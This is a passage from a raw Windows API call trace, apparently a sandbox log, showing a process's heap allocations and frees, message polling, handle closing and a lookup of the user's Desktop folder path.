hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.083] FreeLibrary (hLibModule=0x74d40000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.083] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.083] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.084] CloseHandle (hObject=0x2a8) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.085] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.085] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0188.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aaec0 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0188.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0188.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.086] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.086] CloseHandle (hObject=0x2ac) returned 1 [0188.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0188.090] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0188.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0188.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0188.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0188.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0188.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0188.095] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0188.095] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.095] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0188.096] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.096] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0188.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0188.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0188.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0188.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0188.097] RtlAllocateHeap 